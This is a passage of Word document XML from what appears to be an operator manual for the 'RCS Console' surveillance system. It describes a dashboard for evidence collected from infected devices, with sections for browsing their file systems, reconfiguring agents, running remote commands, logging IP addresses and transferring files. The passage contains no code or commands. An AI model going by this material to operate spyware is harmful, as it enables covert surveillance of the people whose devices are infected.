    <w:p w:rsidR="00B81B9B" w:rsidRDefault="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B81B9B" w:rsidSect="00CE07E2">
          <w:headerReference w:type="default" r:id="rId333"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1418" w:right="1134" w:bottom="1134" w:left="1134" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A76B3F" w:rsidRDefault="00A76B3F" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc372642523"/>
      <w:r w:rsidRPr="00DA06EB">
        <w:lastRenderedPageBreak/>
        <w:t>Dashboard and Alerting</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w:rsidR="00B81B9B" w:rsidRPr="00D76804" w:rsidRDefault="00B81B9B" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc372642524"/>
      <w:r w:rsidRPr="00D76804">
        <w:t>Understanding Evidences</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w:rsidR="00B81B9B" w:rsidRDefault="00B81B9B" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D595F" w:rsidRPr="00A27EE8" w:rsidRDefault="001D595F" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27EE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Dashboard allows to monitor the evidences received from each Agent and to organize them for</w:t>
      </w:r>
      <w:r w:rsidR="00A27EE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27EE8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Operation, Target or Agent. Each Console user can customize their Dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D595F" w:rsidRDefault="001D595F" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A27EE8" w:rsidRDefault="005C1DDC" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adding a Target or an Agent to the Console perspective, you can directly access different types of evidences simply clicking on the specific icon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27EE8" w:rsidRPr="00A27EE8" w:rsidRDefault="00A27EE8" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001D595F" w:rsidRDefault="001A509B" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6115050" cy="21907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15050" cy="2190750"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C1DDC" w:rsidRPr="003B0583" w:rsidRDefault="005C1DDC" w:rsidP="005C1DDC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C1DDC" w:rsidRDefault="00117549" w:rsidP="005C1DDC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidR="005C1DDC">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="005C1DDC" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="005C1DDC">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> RCS </w:t>
      </w:r>
      <w:r w:rsidR="005C1DDC" w:rsidRPr="00957E2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Console ] </w:t>
      </w:r>
      <w:r w:rsidR="005C1DDC">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A27EE8" w:rsidRDefault="00A27EE8" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A5D20" w:rsidRDefault="006A5D20" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AE75C2" w:rsidRDefault="00AE75C2" w:rsidP="00AE75C2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The images above show the 3 different objects that can be added to the Dashboard perspective, respectively Operation</w:t>
      </w:r>
      <w:r w:rsidR="001A509B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (that contains Targets)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Target</w:t>
      </w:r>
      <w:r w:rsidR="001A509B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (that contains Agents)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C1DDC" w:rsidRDefault="005C1DDC" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B47AFE" w:rsidRDefault="006A5D20" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The upper-right number (blue circle) indicates the number of evidences of that type received during the last synchronization. The bottom-right number</w:t>
      </w:r>
      <w:r w:rsidR="00215095">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001A509B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">white </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>circle) counts the total evidences of that type collected since last Console login.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47AFE" w:rsidRDefault="00B47AFE" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A27EE8" w:rsidRDefault="004C2FFB" w:rsidP="00B81B9B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Adding an Agent to the Dashboard, you can </w:t>
      </w:r>
      <w:r w:rsidR="00B47AFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="005113DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">quickly </w:t>
      </w:r>
      <w:r w:rsidR="00351453">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">move </w:t>
      </w:r>
      <w:r w:rsidR="00061FD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into 6 sub-sections</w:t>
      </w:r>
      <w:r w:rsidR="004177CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00351453">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004177CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">available </w:t>
      </w:r>
      <w:r w:rsidR="004A26F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">after an infection </w:t>
      </w:r>
      <w:r w:rsidR="004177CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">at Agent </w:t>
      </w:r>
      <w:r w:rsidR="00351453">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>level</w:t>
      </w:r>
      <w:r w:rsidR="004177CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A26F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">only </w:t>
      </w:r>
      <w:r w:rsidR="00295FC5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and explained </w:t>
      </w:r>
      <w:r w:rsidR="00B47AFE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>in the next page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B47AFE" w:rsidRDefault="00B47AFE">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tabellagriglia4-colore1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="25" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1504"/>
        <w:gridCol w:w="1462"/>
        <w:gridCol w:w="6637"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A4857" w:rsidTr="00B47AFE">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04" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="95B3D7" w:themeColor="accent1" w:themeTint="99"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Status </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="4F81BD" w:themeColor="accent1"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00F64671">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Section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00F64671">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7A4857" w:rsidTr="00886C20">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7A4857" w:rsidRPr="00A05E51" w:rsidRDefault="007A4857" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="885" w:dyaOrig="1110">
                <v:shape id="_x0000_i1109" type="#_x0000_t75" style="width:44.25pt;height:55.5pt" o:ole="">
                  <v:imagedata r:id="rId335" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1109" DrawAspect="Content" ObjectID="_1446455324" r:id="rId336"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRPr="00A05E51" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="00FE3ECD" w:rsidP="00FE3ECD">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The Evidence section contains all the evidences synchronized from the infected device. All the evidences can be filtered and exported, according to Evidence Analyst’s needs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">
        <w:trPr>
          <w:trHeight w:val="1417"/>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7A4857" w:rsidRPr="00A05E51" w:rsidRDefault="007A4857" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="1005" w:dyaOrig="1125">
                <v:shape id="_x0000_i1110" type="#_x0000_t75" style="width:50.25pt;height:56.25pt" o:ole="">
                  <v:imagedata r:id="rId337" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1110" DrawAspect="Content" ObjectID="_1446455325" r:id="rId338"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRPr="00A05E51" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D278B6" w:rsidRDefault="00D278B6" w:rsidP="00D278B6">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After the first synchronization, the File System section provides the first level of the file system tree structure of the infected device. The Evidence Analyst can require more levels to be downloaded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">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7A4857" w:rsidRDefault="007A4857" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="870" w:dyaOrig="1110">
                <v:shape id="_x0000_i1111" type="#_x0000_t75" style="width:43.5pt;height:55.5pt" o:ole="">
                  <v:imagedata r:id="rId339" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1111" DrawAspect="Content" ObjectID="_1446455326" r:id="rId340"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="008A192C" w:rsidP="00F64671">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The Config section allows Technicians to modify on-the-fly the Agent configuration on the infected device.</w:t>
            </w:r>
            <w:r w:rsidR="00486043">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> There’s no limit for the total number of changes that can be sent to the Agent.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">
        <w:trPr>
          <w:trHeight w:val="1417"/>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7A4857" w:rsidRDefault="00086057" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="765" w:dyaOrig="1125">
                <v:shape id="_x0000_i1112" type="#_x0000_t75" style="width:38.25pt;height:56.25pt" o:ole="">
                  <v:imagedata r:id="rId341" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1112" DrawAspect="Content" ObjectID="_1446455327" r:id="rId342"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Info</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="008812BD" w:rsidP="008812BD">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The Info section is used autonomously by the Agent to store important information like infection timestamp and more. It can be also manually used by Technicians in order to store actions logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">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7A4857" w:rsidRDefault="00086057" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="1065" w:dyaOrig="990">
                <v:shape id="_x0000_i1113" type="#_x0000_t75" style="width:53.25pt;height:49.5pt" o:ole="">
                  <v:imagedata r:id="rId343" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1113" DrawAspect="Content" ObjectID="_1446455328" r:id="rId344"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Commands</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="002C6B36" w:rsidP="002C6B36">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If there is the need to run specific commands on the infected device, you can use the Commands section. When a command is executed on the infected device, the Commands section will receive the output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">
        <w:trPr>
          <w:trHeight w:val="1417"/>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7A4857" w:rsidRDefault="00086057" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="900" w:dyaOrig="990">
                <v:shape id="_x0000_i1114" type="#_x0000_t75" style="width:45pt;height:49.5pt" o:ole="">
                  <v:imagedata r:id="rId345" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1114" DrawAspect="Content" ObjectID="_1446455329" r:id="rId346"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="006B50ED" w:rsidP="00F6467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The IP Address section simply contains the list of all the public IP addresses used by the infected device to synchronize data with the first anonymizer of the synchronization chain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A4857" w:rsidTr="00886C20">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7A4857" w:rsidRDefault="00086057" w:rsidP="00F64671">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:object w:dxaOrig="1065" w:dyaOrig="1020">
                <v:shape id="_x0000_i1115" type="#_x0000_t75" style="width:53.25pt;height:51pt" o:ole="">
                  <v:imagedata r:id="rId347" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1115" DrawAspect="Content" ObjectID="_1446455330" r:id="rId348"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1462" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="007A4857" w:rsidRDefault="007A4857" w:rsidP="00886C20">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>File Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6642" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F85B2D" w:rsidRDefault="00773080" w:rsidP="00F85B2D">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File Transfer section allows </w:t>
            </w:r>
            <w:r w:rsidR="00534F4F">
